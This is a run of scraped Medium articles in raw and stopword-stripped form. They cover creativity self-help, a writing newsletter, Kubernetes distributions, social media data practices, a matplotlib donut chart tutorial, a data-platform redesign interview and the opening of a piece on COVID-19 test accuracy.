Imagine inside house look like Consider you’d craft room even holiday feast Picture face potential mate Imagine first encounter would wear meet Create laminate index card pocket index card write top 3 life goal Keep card easy place take look minute concept remind goal dream future self need reminded present love long plan accomplish Ponder want achieve goal Savor victory Cherish wish visualize arriving accolade honor Remember hold creative power pursue every goal decide process Let mind run free Consider following question today tomorrow next week next month go goal mini step take today get headed toward tomorrow’s success Take massive action head toward dream Role model help u grow Identify someone admire hold high regard enjoy research involved studying famous psychologist neurologist criminal forensic scientist idea present inspire work justice system helping prevent violence consider history success focus become inspired keep pursuing dream Ask like would life improve acted believed Sometimes personality trait see others make u feel happy content act trait we’d begin demonstrate behavior Usually around someone 10 minute day you’ll start acting like person mindful study next month emulate characteristic admire Maybe Joe get work time positive attitude tackle job without criticizing manager leader notice different characteristic Joe may start emulate ceasing negative selftalk leadership team even feel justified Find way look good around share see Trying new personal characteristic allows stretch creatively see Try something new Experiment new creative activity Explore art craft store buy block clay jewelrymaking kit paint canvas Look Pinterest 
idea DoItYourself creative idea Find way incorporate artistic side week schedule cultivate creativity build artistic side u may realized past · One benefit setting time 30 minute limit project mean complete one setting It’s possible you’ll spend halfhour mark however it’s creativity looking necessarily time skill expand time ‘away’ work activity becomes event look forward Art creative craft class local store may perfect get interested Sometimes class take move time several week day Start feel comfortable build creativity life you’ll begin feel imagination take Working hand mind together open new avenue Release innovator inside Delve 30 minute pure inventionfocused growth focus energy strategy connect 2 3 together you’ll find developing new set coping strategy reducing stress becoming building resourcefulness well connecting younger version Believe creative individual feel confident you’ll prove talent Take time something cultivates imagination originality either daily weekly consider favorite artist side realize let slide much need return first love art Maybe read article want delve explore side yet found one lay dormant surface hustle bustle encourage step find artist inside thought PamelaTags Self Mental Health Growth Creativity Art
3,808
You had a lot to say this week
I love when I can read someone else’s work and feel the energy of the piece. It’s like the words are lightning bolts that leap off the page and charge my mind. That feeling happened a lot this week and our writers are to thank. They delivered moving monologues on love, fear, absence and guilt. Here’s what you missed: I also jumped in the mix this week with a piece titled Chaos and Creativity. It’s a short think piece on our ability to create through strained conditions. We already have more stories coming in so next week promises to be equally inspiring. Keep submitting. We’re staying open to submissions over the holidays so if you feel like you have something to say, say it. We’ll publish it.
https://medium.com/cry-mag/you-had-a-lot-to-say-this-week-a6246e939852
['Kern Carter']
2020-12-12 12:46:45.529000+00:00
['Newsletter', 'Fear', 'Creativity', 'Love', 'Writing']
Title lot say weekContent love read someone else’s work feel energy piece It’s like word lightning bolt leap page charge mind feeling happened lot week writer thank delivered moving monologue love fear absence guilt Here’s missed also jumped mix week piece titled Chaos Creativity It’s short think piece ability create strained condition already story coming next week promise equally inspiring Keep submitting We’re staying open submission holiday feel like something say say We’ll publish itTags Newsletter Fear Creativity Love Writing
3,809
Kubernetes Distributions — What Are They?
Kubernetes Distributions — What Are They? Learn what they are and why they matter to you Photo by Drew Beamer on Unsplash One of the biggest announcements from the latest AWS re:Invent 2020 sessions was the release of EKS-D from Amazon. EKS-D is their open-source Kubernetes distribution that’s now available for everyone to start using in their cloud provider of choice or even on premises. It’s based on past findings and the entire process Amazon has undergone in managing its managed Kubernetes platform, Amazon EKS. These announcements have many people asking themselves: “OK, I know Kubernetes, but what’s a Kubernetes distribution? And why should I care?” So I’ll try to answer that with the knowledge I have, and I always try to use the same approach: a Kubernetes versus Linux model comparison. Kubernetes is an open-source project, as you know, started by Google and now managed by the community and the Cloud Native Computing Foundation (CNCF), and you can find all of the code in the project’s public repository. But let’s be honest: Not many of us are pulling that repo and trying to compile it to provide a cluster. That’s not how we usually work. If you follow the code path — downloading it, building it, and so on — this is usually named vanilla Kubernetes. If we start with the Linux comparison, it’s the same situation we have with the Linux kernel that most Linux distributions ship: it comes already compiled and available with a bunch of other tools, all working together via the usual approach. So that’s what a Kubernetes distribution is. It builds Kubernetes, and it provides other tools and components to enhance it or add more features, often focusing on additional aspects such as security or DevOps. Another concept that usually comes up is the purity of a distribution. We call a distribution pure when it simply builds Kubernetes, and that’s it. It leaves everything else to the developers or users to decide what they want to use on top of it.
https://medium.com/better-programming/kubernetes-distributions-what-are-they-be2c438c8706
['Alex Vazquez']
2020-12-28 16:38:12.254000+00:00
['Software Development', 'AWS', 'Kubernetes', 'Containers', 'Programming']
Title Kubernetes Distributions — TheyContent Kubernetes Distributions — Learn matter Photo Drew Beamer Unsplash One biggest announcement latest AWS reInvent 2020 session release EKSD Amazon EKSD opensource Kubernetes distribution that’s available everyone start using cloud provider even premise It’s based past finding entire process Amazon undergone managing Kubernetes managed platform Amazon EKS announcement many people asking “OK know Kubernetes what’s Kubernetes distribution care” I’ll try answer knowledge always try use approach Kubernetes versus Linux model comparison Kubernetes opensource project know started Google managed community Cloud Native Computing Foundation CNCF find code available let’s honest many u pulling repo trying compile provide cluster That’s usually work follow code path — downloading building — usually named vanilla Kubernetes start Linux comparison it’s situation Linux kernel Linux distribution ship already compiled available bunch tool working together via usual approach that’s Kubernetes distribution build Kubernetes provide tool component enhance provide feature focus additional aspect like security focus DevOps focus another focus Another concept usually raised purity distribution try talk distribution that’s pure call distribution pure it’s building Kubernetes that’s leaf everything else developer user decide want use top itTags Software Development AWS Kubernetes Containers Programming
3,810
Don’t Sell Your Emotions on Social Media
Before reading the article, I would like you to take some time and think about the changes in your social and professional behavior since you started using social media. Have you got anything? No! Don’t worry. Take a long breath and start reading the article. “THE TECHNOLOGY THAT CONNECTS US, ALSO CONTROLS US.” — Social Dilemma Social media isn’t a tool that’s just waiting to be used. It has its own goals and it has its own means of pursuing them. There are 3.81 billion social media users in the world, a number that grows by 9.2% every year. Have you ever thought about why there is so much user engagement on these social platforms? Everyone is fascinated by social media features. They make users feel involved. They help me stay in touch with what my friends are doing, stay up-to-date with news and current events, expand my general networking with people, find funny and entertaining content, share photos & videos with others, share my opinion on any current issue, and much more. “But what if I tell you that you are nothing but a product for social media to sell!!” Now you might ask me how I can claim that you are the product. The simple answer is ‘Data’. I don’t know whether you are aware of it or not, but the AI techniques integrated into these social media platforms monitor your smallest actions: the engagement time on a particular post, the type of post that you liked, shared or commented on, your reaction to the post your friend liked or shared, what’s trending in your area according to your GPS location, and the types of accounts you search for or follow. Collecting all this data, media giants understand your interests, likes, dislikes, perceptions, motives, nature, and most importantly your emotions. Now, if I were to summarize what I have stated so far, I would say, “YOU ARE TRAPPED!!” Photo by Artyom Kim on Unsplash I think you got a glimpse of the objective of the article. Let’s divide the article into two parts now: first, why I said you are the product to sell, and second, why I exclaimed that you are trapped!! The complex algorithms designed by the experts at social media giants work entirely on the data you provide them through your clickable actions and post engagements. Consider a situation where you like animal posts 10–12 times in a row; a human will easily figure out that you are fond of animals, but what about machines? They analyze the data, understand your behavior, find the patterns, and test what they have learned against your emotions. That’s how they build the predictive models, forecast the outcomes, and get constantly updated with new data. Now just think: I am running a company that manufactures gym equipment and sells it in the market. I want help from social media, so I sponsor an ad, say on Instagram, for a certain amount, hoping for high customer engagement. Now suppose you live near my company’s location and you are a fitness freak, which Instagram knows. Then of course you will get the ad in your Instagram feed, and it will nudge you to buy the equipment; if you happen to be looking for some cool stuff and you like the products mentioned in the ad, then you will surely purchase it, and obviously I will say I got a new customer. “That’s great! How cool is social media!” Now again you can ask me what the wrong deal about this is; after all, I got what I wanted. 
It was something I was interested in, so it’s good that I purchased it. But when you think about it more deeply, you will understand that social media sold you, because you are the perfect customer for that type of product. Instagram knows how many fitness posts you have liked, that you follow fitness influencers, that you share fitness posts, and much more. That’s where your interests play a vital role. They utilize your data to suggest the best possible recommendations and, in return, you can’t restrain yourself from purchasing. The same predictive modeling is used to maintain your social media feeds, where you get video recommendations, post referrals, or product ads based on your interests; indirectly, they push you to get involved in these things, spend more time scrolling through posts, and buy items, which in turn makes huge revenues for them. The recommendation engines are capable of keeping track of your every action and updating the suggestions continuously, so that you can’t detach yourself from them. You repeatedly scroll your feed and keep the flow going. Whenever we search for a product on e-commerce sites, after viewing 2–3 items we get the same product ad in our social media feed, email, etc. They are playing with your mindset: they push notifications at certain intervals of time so that their ultimate goal of keeping you involved is achieved, and eventually you get manipulated into purchasing that product. Coming back to my second exclamation, You are trapped!! Excess of anything is harmful; if you are unable to feel it at present, then you will surely experience it in the future. I would like to share some social media facts which will disturb you for sure. Photo by Sydney Sims on Unsplash 95% of social media using teens have witnessed cruel behavior on social networking sites. In the world, 80% of teens use Facebook, and 54% of those experienced cyberbullying. 9X higher chances of identity fraud. Engaging in dangerous & harmful activities including reckless behavior, substance abuse, or self-injury. Higher risk of depression, trouble sleeping, ongoing sadness, and losing interest in favorite activities. Sharing of inappropriate content/misinformation distribution. Relationship threats, abuse, intimidation, faking perfection, social comparison, and self-esteem issues. 140–150 mins daily time spent on social networking sites worldwide. 39,757 years collectively spent per day on FACEBOOK. 25% of the users have admitted to being distracted during intimacy. 14% have risked their own safety. According to MIT Research, fake news spread 6 times faster than real news on Twitter. 62% of the population worldwide confesses to believing fake news. 89% of Americans believe that social media is responsible for spreading misinformation. 29% of the population deleted/removed social media accounts because they felt overloaded by it. 
The Prime Minister of India, Narendra Modi, has 60% fake followers on Twitter, while US President Donald Trump has 37% and Congress Party member Rahul Gandhi has 69% fake followers on Twitter. Social media use in India has grown from 137 million to over 600 million users in 2019, which fuels fake news distribution (230 million WhatsApp users, the highest in any country). There are only two industries that call their customers ‘USERS’: ILLEGAL DRUGS & SOFTWARE. Now, after reading all these facts, just ask yourself whether you are using these social media platforms effectively or creating problems for yourself. If we think about fake news distribution, we can’t trust that anyone is sharing real news. If we think of social comparison, we can’t decide whether any person’s guidance will be beneficial for us or not. If we think about relationships, we never know when we will get disheartened, and that will lead to depression and anxiety. Social media is an unauthorized spy who knows everything about you: your interests, mental condition, weekly plans, location, birthday, relationships, health, habits, next food order, visits, mentors, successes, failures, and many more things that you don’t even know about yourself. “Social media is training us to compare our lives, instead of appreciating everything we are. No wonder why everyone is always depressed”. — Bill Murray Sharing our data is our responsibility: what to share, when to share, how to share, why to share, and with whom to share; all these things will shape your future actions. Photo by Ross Findon on Unsplash In the end, I request you: it’s a social life, please don’t make it so personal. Don’t post your feelings. Don’t share your emotions. This is not the kind of world where you can think, “I will get genuine advice from others.” Nooo! Don’t expect this from social media. There are so many people who are going to judge you based on your post engagements and form perceptions from them, but you just have to outsmart them. Enjoy your weekend fully social media free, spend time with loved ones, and invest time in your favorite activities. Finally, I suggest you think about your current situation and work on your mindset to utilize such social media platforms in a more effective way, so that they help your potential growth. Don’t use social media to impress people; utilize it to impact people. I hope this article brings a valuable change in your social & personal life. Thanks for reading the article. Now it’s up to you; choose wisely.
https://medium.com/plus-marketing/dont-sell-your-emotions-on-social-media-6079735e2dc6
['Amey Band']
2020-11-20 13:26:12.067000+00:00
['AI', 'Social Media', 'Emotional Intelligence', 'Instagram', 'Facebook']
Title Don’t Sell Emotions Social MediaContent reading article would like take time think change social professional behavior since started using social medium got anything Don’t worry Take long breath start reading article “THE TECHNOLOGY CONNECTS US ALSO CONTROLS US” — Social Dilemma Social medium isn’t tool that’s waiting used goal mean pursuing 381 billion social medium user world increase 92 user every year ever think much user engagement social platform Everyone fascinated social medium feature help making user feel involved help stay touch friend stay uptodate news current event increase general networking people find funny entertaining content share photo video others share opinion current issue many “But tell nothing product sell social media” question claiming u product simple answer ‘Data’ don’t know whether aware fact AI technique integrated social medium platform monitor smallest smallest action like engagement time particular post type post liked shared commented reaction post friend liked shared what’s trending area respective GPS location type account search follow Collecting data medium giant understand interest like dislike perception motif nature importantly emotion would like summarize stated would say “YOU TRAPPED” Photo Artyom Kim Unsplash think got glimpse idea objective article Let’s divide article two part first said product sell second exclaimed trapped complex complex algorithm designed expertise social medium giant totally worked data provide clickable action post engagement Consider situation liking animal post continuously 10–12 time human easily figure fond animal case machine Analyzing data understanding behavior finding pattern test learning emotion That’s build predictive model forecast outcome get constantly updated new data think running company deal manufacturing gym type equipment sell market want help social medium sponsor ad like say Instagram charged certain amount hoping high customer engagement think live near company’s location fitness freak Instagram know course get ad Instagram feed manipulate buy type equipment case looking cool stuff like product mentioned ad sure purchase obviously say got new customer “That’s great cool social media” question what’s wrong deal got want It’s interest it’s good purchased deeper think understand social medium sold perfect customer type product Instagram know liked much count fitness post follow fitness influencers share fitness post many That’s interest play vital role utilizing data suggest best possible recommendation return cant restrict purchase That’s predictive modeling used maintaining social medium feed get video recommendation post referral product ad based interest indirectly force involve thing spend time scrolling post buying item turn make huge revenue recommendation engine much capable keep track every action updating suggestion continuously can’t able detach repeatedly scroll feed keep flow Whenever search product ecommerce site viewing 2–3 item get product ad social medium feed email etc playing mindset push notification certain interval time ultimate goal keeping involved achieved lastly get manipulated purchase product Coming back second exclamation trapped Excess anything harmful unable feel present sure experience future would like share social medium fact disturb sure Photo Sydney Sims Unsplash 95 social medium using teen witnessed cruel behavior social networking site social medium using teen witnessed world 80 teen use Facebook 54 experienced cyberbullying teen use experienced 9X higher 
chance identity fraud Engaging dangerous harmful activity including reckless behavior substance abuse selfinjury including reckless behavior substance abuse selfinjury Higher risk depression trouble sleeping ongoing sadness losing interest favorite activity trouble ongoing losing interest favorite activity Sharing inappropriate contentmisinformation distribution distribution Relationship threat abuse intimidation faking perfection social comparison selfesteem increase abuse intimidation social comparison selfesteem increase 140–150 min daily time spent social networking site worldwide 39757 year collectively spent per day FACEBOOK daily time spent social networking site worldwide collectively spent per day 25 user admitted distracted intimacy 14 risked safety user admitted distracted risked safety According MIT Research fake news spread 6 time faster real news Twitter news spread faster news 62 population worldwide confesses believing fake news population worldwide confesses believing fake news 89 Americans believe social medium responsible spreading misinformation Americans believe social medium spreading misinformation 29 population deletedremoved social medium account felt overloaded population Prime Minister India Narendra Modi 60 fake follower Twitter US President Donald Trump 37 Congress Party Member Rahul Gandhi 69 fake follower Twitter Social medium growth India risen 137 million 600 million 2019 lead fake news distribution 230 million Whatsapp user highest country two industry call customer’s ‘USERS’ ILLEGAL DRUGS SOFTWARE reading fact ask using social medium platform effectively rising problem think fake news distribution can’t trust anyone sharing real news think social comparison can’t decide whether guidance person beneficial u think relationship never know get disheartened lead depression anxiety Social medium unauthorized spy know everything like interest mental condition week plan location birthday relationship health habit next food order visit mentor success failure many thing also don’t know “Social medium training u compare life instead appreciating everything wonder everyone always depressed” — Bill Murray haring data responsibility share share share share share thing responsible future action Photo Ross Findon Unsplash end request it’s social life please don’t make much personnel Don’t post feeling Don’t share emotion kind world think get genuine advice others Nooo don’t expect social medium many people gonna judge based post engagement make perception want trick Enjoy weekend fully social medium free spent time loved one invest time favorite activity Finally suggest think current situation work mentality utilize social medium platform effective way help potential growth Don’t use social medium impress people utilize impact people hope article brings valuable change social personnel life Thanks reading article it’s choose wiselyTags AI Social Media Emotional Intelligence Instagram Facebook
3,811
Donut Plot with Matplotlib (Python)
Donut Plot with Matplotlib (Python) Let’s start by praising visualizations with a very famous English-language adage. It’s cliche but dead on. “A picture is worth a thousand words” In this post, I’ll demonstrate how to create a donut plot using matplotlib with Python. A donut plot is a very efficient way of comparing stats of multiple entities. As per [1]: Just like a pie chart, a doughnut chart shows the relationship of parts to a whole, but a doughnut chart can contain more than one data series. Each data series that you plot in a doughnut chart adds a ring to the chart. Now let’s use the following dummy data representing the usage of mobile applications of different social media websites.

╔═════════════════╦══════════╗
║ Social Media    ║ Usage    ║
╠═════════════════╬══════════╣
║ Twitter         ║ 60 %     ║
║ Facebook        ║ 75 %     ║
║ Instagram       ║ 80 %     ║
╚═════════════════╩══════════╝

Following is the code for creating a donut plot.

import re
import pandas as pd
import matplotlib.pyplot as plt

# Each row of testdata.csv holds a "scenario" label and a "Percentage" string.
data = pd.read_csv('testdata.csv')
print(data.head())

# Create donut plots: one ring per row, starting from the outermost radius.
startingRadius = 0.7 + (0.3 * (len(data) - 1))
for index, row in data.iterrows():
    scenario = row["scenario"]
    percentage = row["Percentage"]
    textLabel = scenario + ' ' + percentage

    # Extract the numeric part of the percentage string, e.g. "60 %" -> 60.
    percentage = int(re.search(r'\d+', percentage).group())
    remainingPie = 100 - percentage
    donut_sizes = [remainingPie, percentage]

    # Label each ring near its inner edge.
    plt.text(0.01, startingRadius + 0.07, textLabel,
             horizontalalignment='center', verticalalignment='center')
    plt.pie(donut_sizes, radius=startingRadius, startangle=90,
            colors=['#d5f6da', '#5cdb6f'],
            wedgeprops={'edgecolor': 'white', 'linewidth': 1})

    startingRadius -= 0.3

# 'equal' ensures the pie chart is drawn as a circle (equal aspect ratio).
plt.axis('equal')

# Create a white circle and place it at the center to turn the stacked pies into a donut.
circle = plt.Circle(xy=(0, 0), radius=0.35, facecolor='white')
plt.gca().add_artist(circle)

plt.savefig('donutPlot.jpg')
plt.show()

Donut Plot At its core, the donut plot in this code is created by drawing a series of pie charts of different radii, one on top of the other, with a white circle in the center. References [1] https://support.office.com/en-us/article/present-your-data-in-a-doughnut-chart-0ac0efde-34e2-4dc6-9b7f-ac93d1783353
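A quick addendum to the listing above: if you would rather not create a testdata.csv file, the same plotting loop can be driven from an inline DataFrame. This is only a minimal sketch, assuming the "scenario" / "Percentage" column names the snippet expects; the values simply mirror the dummy table.

import pandas as pd

# Hypothetical inline equivalent of testdata.csv, mirroring the dummy table above.
data = pd.DataFrame({
    "scenario": ["Twitter", "Facebook", "Instagram"],
    "Percentage": ["60 %", "75 %", "80 %"],
})
print(data)

The for-loop from the listing can then be reused on this DataFrame without any changes, since it only relies on those two columns.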
https://towardsdatascience.com/donut-plot-with-matplotlib-python-be3451f22704
['Asad Mahmood']
2019-06-12 22:17:54.482000+00:00
['Data Sceince', 'Matplotlib', 'Python', 'Data Visualization']
Title Donut Plot Matplotlib PythonContent Donut Plot Matplotlib Python Let’s start praising visualization famous English language adage It’s cliche dead “A picture worth thousand words” post I’ll demonstrate create donut plot using matplotlib python Donut plot efficient way comparing stats multiple entity per 1 like pie chart doughnut chart show relationship part whole doughnut chart contain one data series data series plot adoughnut chart add ring chart let’s use following dummy data representing usage mobile application different social medium website ╔═════════════════╦══════════╗ ║ Social Media ║ Usage ║ ╠═════════════════╬══════════╣ ║ Twitter ║ 60 ║ ║ Facebook ║ 75 ║ ║ Instagram ║ 80 ║ ╚═════════════════╩══════════╝ Following code creating donut plot import panda pd import data pdreadcsvtestdatacsv printdatahead import matplotlibpyplot plt create donut plot startingRadius 07 03 lendata1 index row dataiterrows scenario rowscenario percentage rowPercentage textLabel scenario percentage printstartingRadius percentage intresearchrd percentagegroup remainingPie 100 percentage donutsizes remainingPie percentage plttext001 startingRadius 007 textLabel horizontalalignmentcenter verticalalignmentcenter pltpiedonutsizes radiusstartingRadius startangle90 colorsd5f6da 5cdb6f wedgepropsedgecolor white linewidth 1 startingRadius03 equal ensures pie chart drawn circle equal aspect ratio pltaxisequal create circle place onto pie chart circle pltCirclexy0 0 radius035 facecolorwhite pltgcaaddartistcircle pltsavefigdonutPlotjpg pltshow Donut Plot core donut plot code created creating series pie chart different radius one top white circle center References 1 httpssupportofficecomenusarticlepresentyourdatainadoughnutchart0ac0efde34e24dc69b7fac93d1783353Tags Data Sceince Matplotlib Python Data Visualization
3,812
How we made Resource Watch even easier to use.
Design and user research go hand in hand when it comes to product development. Both are essential if you want to make a product that is useful, usable, and used. We’ve been working with the Resource Watch team at World Resources Institute (WRI) on a redesign that makes planetary data easier to use. I spoke with Dani Caso (Designer) and Martin Dubuisson (User Researcher) to find out more. So, why did Resource Watch get a redesign? Dani: User research done by Martin revealed several things that we could improve in terms of the user experience on Resource Watch. Rather than taking each problem one by one and finding isolated solutions, we decided it made more sense to reconfigure the whole space. Martin: The Explore page — a sort of library of open-source global datasets that can be accessed and visualized on a map — is really the core offering of Resource Watch. Over the years the page has hosted a growing number of datasets on a vast array of different topics. In our conversation with users, many had described the Explore page as “overwhelming”. Yes, they can search for datasets in the search bar, but some users weren’t sure which words they should type or which datasets are available. Our main challenge was to represent the breadth of the data, invite exploration, and inspire (which are key elements of the value proposition to our users). While at the same time providing users with quick access to the datasets they are searching for. In addition to that, we also took advantage of this redesign to tackle a number of other changes, based on needs detected from our previous testing. For example, these included making it easier for users to customise their experience, and removing misleading redirections. We made a conscious decision to work very closely with the Resource Watch team at WRI. We carried out some interviews together, and involved the whole team in a co-analysis session. We asked them to review some recordings of the user testing so that we could discuss them in-depth and cross-reference our interpretations. This was a fun exercise, and more importantly, it helped ensure that the key learnings about users wouldn’t simply end up in a one-directional presentation (and therefore probably quickly forgotten about). Instead, this approach meant that our user insights were built and absorbed by everyone on the team. Members of WRI’s Resource Watch team came to our Madrid office for a co-analysis session where we discussed the findings of the user research in more detail. What information did you use to develop the new design for Resource Watch? Dani: Knowing who your users are and what they need is the first and most important piece of information you need when designing a data platform. Martin’s research told us that policymakers, journalists, and educators were the three key users of Resource Watch. The conversations with people from these three groups also told us that there’s a wide range of experience and knowledge level that we need to cater for. We needed a design that would make the Resource Watch data accessible and usable for all of them. Our goal was to provide the tools that someone needs to be a great analyst. If you’re not an expert on climate data, you’ll need some guidance. If you are a climate data expert, you’ll want the fastest entry point to the most relevant data. When I pitched this approach to WRI, I used the Pixar movie ‘Ratatouille’ as a reference. 
In that movie, a stuck-up food critic learns that anyone can become a great cook if you give them tools (or a good cook book!) to work with. Our aim is the same with Resource Watch. We’re giving every chef the tools they need to create delicious dishes of data. Martin: On most of our projects, we try to gather as much information as possible about a situation before making decisions. In this case, our main approach was to carry out user testing — showing the new designs to users, hearing their feedback, and analyzing their behavior and words. But we also had a look at quantitative sources too: we looked at Google Analytics (website analytics to get large scale statistics on user behavior), to know, for example, more about the keywords that users enter when doing a search on Resource Watch. Over the years, we’ve developed a more solid understanding of our users. So, we’ve been revisiting our conclusions from previous user testings, to make sure we build on previous blocks of knowledge and gain an increasingly accurate picture. How do you simplify things without losing information? Dani: You simplify things by having everything in order. That doesn’t mean you need to get rid of things. You simply reorganise what you have. It’s like tidying your house and choosing where to put things. You probably won’t throw anything away, but you will put things in places that make them easier to find when you need them. Martin: As a user researcher, it’s my role to find the barriers that block people from finding the information they want. Once we find them, Dani uses design to take them away. Something that our user research team has noticed over and over in many projects, is that most people don’t bother reading long texts — or even long paragraphs — for example those that describe the datasets. Now, this might not come as a big surprise to most of you, we’ve all heard that attention spans are getting shorter. But in most of our projects — where many of our users have scientific backgrounds — we had assumed that they would be keen on reading all the details. Truth is: many science-minded people skim read too, or they just want to go straight to the point. Which means, more often than not, just a few well-worded, well-placed bullet points will do! The design can always include a hyperlink or an additional information button to cater to those who will be keen on reading more. Dani: In the case of Resource Watch, we’ve added customised features that allow users to curate and save the data they regularly use. When we designed this, we took inspiration from playlists and pinterest boards that people use to gather the things they care about most. We also drew inspiration from Netflix and how they categorise movies and tv shows, to help us assemble groups of datasets that relate to one another. The challenge here was to turn an experience that’s often considered boring into something fun! Data doesn’t need to be boring. Information is interesting! So, if we make the digestion of data easier, and let people enjoy it, they will use it! Boring can be a barrier. Data should be understandable, accessible and beautiful. Beauty comes from being understandable and accessible. These are the principles we follow when thinking about design. Every sprint needs a silly moment to help creative ideas flow. What’s your favourite thing about the new Resource Watch? Dani: My favourite thing about the new Resource Watch is that we are opening up new possibilities. We’ve created a stronger foundation from which we can grow. 
We’re turning our attention to better mobile design, and the design choices we’ve made up to now will make that next step easier to do. We’ve also opened up new possibilities for user customisation. I’m already feeling excited about the new things that will come in the future. Humans thinking for humans is what makes Resource Watch so special. We took the time to select which datasets should be offered up to each user. We haven’t relied on an algorithm to make those choices. When a user chooses a dataset, the recommendations they see will be contextually related and suggested by another human. Martin: I feel there is something cute and compact about the new Resource Watch, a bit like what Dani was saying before: you’re not getting rid of anything, it’s more that datasets are much more visible and ordered, as if it were a very tidy cupboard. I also really like the great job that the team did on the “explanations” (metadata) page of each dataset. In the new design, instead of redirecting users to a new page, the key bits of information have been condensed, so that they can now just fit into an elegant sidebar solution. Users can read the text information, and yet not lose sight of the map! Learn something new about our planet today on the Resource Watch explore page!
https://medium.com/vizzuality-blog/how-we-made-resource-watch-even-easier-to-use-37c21550a8a9
['Camellia Williams']
2020-07-15 13:50:47.657000+00:00
['Environment', 'User Research', 'Design', 'UX', 'Data']
Title made Resource Watch even easier useContent Design user research go hand hand come product development essential want make product useful usable used We’ve working Resource Watch team World Resources Institute WRI redesign make planetary data easier use spoke Dani Caso Designer Martin Dubuisson User Researcher find Resource Watch get redesign Dani User research done Martin revealed several thing could improve term user experience Resource Watch Rather taking problem one one finding isolated solution decided made sense reconfigure whole space Martin Explore page — sort library opensource global datasets accessed visualized map — really core offering Resource Watch year page hosted growing number datasets vast array different topic conversation user many described Explore page “overwhelming” Yes search datasets search bar user weren’t sure word type datasets available main challenge represent breadth data invite exploration inspire key element value proposition user time providing user quick access datasets searching addition also took advantage redesign tackle number change based need detected previous testing example included making easier user customise experience removing misleading redirections made conscious decision work closely Resource Watch team WRI carried interview together involved whole team coanalysis session asked review recording user testing could discus indepth crossreference interpretation fun exercise importantly helped ensure key learning user wouldn’t simply end onedirectional presentation therefore probably quickly forgotten Instead approach meant user insight built absorbed everyone team Members WRI’s Resource Watch team came Madrid office coanalysis session discussed finding user research detail information use develop new design Resource Watch Dani Knowing user need first important piece information need designing data platform Martin’s research told u policymakers journalist educator three key user Resource Watch conversation people three group also told u there’s wide range experience knowledge level need cater needed design would make Resource Watch data accessible usable goal provide tool someone need great analyst you’re expert climate data you’ll need guidance climate data expert you’ll want fastest entry point relevant data pitched approach WRI used Pixar movie ‘Ratatouille’ reference movie stuckup food critic learns anyone become great cook give tool good cook book work aim Resource Watch We’re giving every chef tool need create delicious dish data Martin project try gather much information possible situation making decision case main approach carry user testing — showing new design user hearing feedback analyzing behavior word also look quantitative source looked Google Analytics website analytics get large scale statistic user behavior know example keywords user enter search Resource Watch year we’ve developed solid understanding user we’ve revisiting conclusion previous user testing make sure build previous block knowledge gain increasingly accurate picture simplify thing without losing information Dani simplify thing everything order doesn’t mean need get rid thing simply reorganise It’s like tidying house choosing put thing probably won’t throw anything away put thing place make easier find need Martin user researcher it’s role find barrier block people finding information want find Dani us design take away Something user research team noticed many project people don’t bother reading long text — even long paragraph — example describe datasets 
might come big surprise we’ve heard attention span getting shorter project — many user scientific background — assumed would keen reading detail Truth many scienceminded people skim read want go straight point mean often wellworded wellplaced bullet point design always include hyperlink additional information button cater keen reading Dani case Resource Watch we’ve added customised feature allow user curate save data regularly use designed took inspiration playlist pinterest board people use gather thing care also drew inspiration Netflix categorise movie tv show help u assemble group datasets relate one another challenge turn experience that’s often considered boring something fun Data doesn’t need boring Information interesting make digestion data easier let people enjoy use Boring barrier Data understandable accessible beautiful Beauty come understandable accessible principle follow thinking design Every sprint need silly moment help creative idea flow What’s favourite thing new Resource Watch Dani favourite thing new Resource Watch opening new possibility We’ve created stronger foundation grow We’re turning attention better mobile design design choice we’ve made make next step easier We’ve also opened new possibility user customisation I’m already feeling excited new thing come future Humans thinking human make Resource Watch special took time select datasets offered user haven’t relied algorithm make choice user chooses dataset recommendation see contextually related suggested another human Martin feel something cute compact new Resource Watch bit like Dani saying you’re getting rid anything it’s datasets much visible ordered tidy cupboard also really like great job team “explanations” metadata page dataset new design instead redirecting user new page key bit information condensed fit elegant sidebar solution Users read text information yet lose sight map Learn something new planet today Resource Watch explore pageTags Environment User Research Design UX Data
3,813
How Accurate and Reliable is COVID-19 Testing?
COVID-19 / MEDICINE / HEALTH How Accurate and Reliable is COVID-19 Testing? PCR-based nasal swab testing and serological antibody testing both have certain limitations. As more and more state health departments and private enterprises continue to ramp up testing capacity for COVID-19, several health experts warn that test results are not 100 percent accurate and should be interpreted in the context of clinical presentation and exposure risk. The most commonly used PCR-based nasal swab test to detect SARS-CoV-2 is highly specific but not very sensitive, meaning positive results are more useful than negative results. In other words, a positive result almost guarantees infection with the novel coronavirus but a negative result cannot rule out the presence of infection. “The issue with the tests for the SARS-CoV-2 virus is that there has not been time to test them rigorously before deploying them in the field,” says Dr. Gary L. LeRoy, president of the American Academy of Family Physicians. “Most polymerase chain reaction (PCR) and antibody tests have years of laboratory testing before they are used. We just don’t have that kind of time. The major concern for false negatives is someone who tests negative, thinking they are not infected, could unknowingly spread the virus into the community.” Healthcare worker administers nasal swab test for COVID-19 at a drive-thru facility (Photo by Zstock) An article published in Mayo Clinic Proceedings draws attention to the risk posed by over-reliance on COVID-19 testing to make public health decisions. Priya Sampathkumar, M.D., an infectious diseases specialist at Mayo Clinic and study co-author, writes that healthcare officials should anticipate a “less visible second wave of infection from people with false-negative test results.” Based on preliminary evidence from China, quantitative reverse transcription polymerase chain reaction (qRT-PCR) COVID-19 testing on nasal swab samples may produce false negatives up to 30% of the time when testing is conducted 0–7 days after illness onset. After 15 days of illness, the chance of receiving a false negative result shoots up to 50%. That false negative figure may be even higher in the US, according to Harlan Krumholz, M.D., a professor of medicine at Yale. In an opinion piece for The New York Times, Dr. Krumholz expounds: “There are many reasons a test would be falsely negative under real-life conditions. Perhaps the sampling is inadequate. A common technique requires the collection of nasal secretions far back in the nose — and then rotating the swab several times. That is not an easy procedure to perform or for patients to tolerate. Other possible causes of false negative results are related to laboratory techniques and the substances used in the tests…If you have had likely exposures and symptoms suggest Covid-19 infection, you probably have it — even if your test is negative.” Nasal swab sample for COVID-19 test in the laboratory (Photo by Robert Kneschke) Dr. Alain Chaoui, head of Congenial Healthcare, a practice with 50,000 patients across five locations in Massachusetts, told The Boston Globe, “A lot of my patients who have symptoms, who I clinically think have COVID-19, are testing negative.” Chaoui is nonetheless advising all his patients who test negative for the virus to assume they are infected and self-quarantine until symptom-free for at least 72 hours. Michelle Taylor tested negative for COVID-19 twice despite presenting with concerning symptoms, including loss of taste and smell. 
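To see why a negative result carries less weight than a positive one, it helps to work through the numbers. The short calculation below is only an illustration: the sensitivity, specificity, and pre-test probability are assumed round values in the ranges discussed in this article, not measured figures for any particular test.

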